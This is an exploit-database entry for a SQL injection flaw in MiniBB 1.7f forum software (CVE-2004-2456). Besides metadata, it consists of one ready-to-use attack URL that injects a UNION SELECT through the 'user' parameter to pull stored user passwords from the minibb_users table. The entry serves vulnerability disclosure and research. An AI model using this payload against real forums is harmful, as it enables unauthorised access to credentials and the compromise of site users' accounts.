MiniBB 1.7f - 'user' SQL Injection



EKU-ID: 8798 CVE: OSVDB-11711;CVE-2004-2456 OSVDB-ID:
Author: anonymous Published: 2004-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Example:

 http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/*

# milw0rm.com [2004-11-16]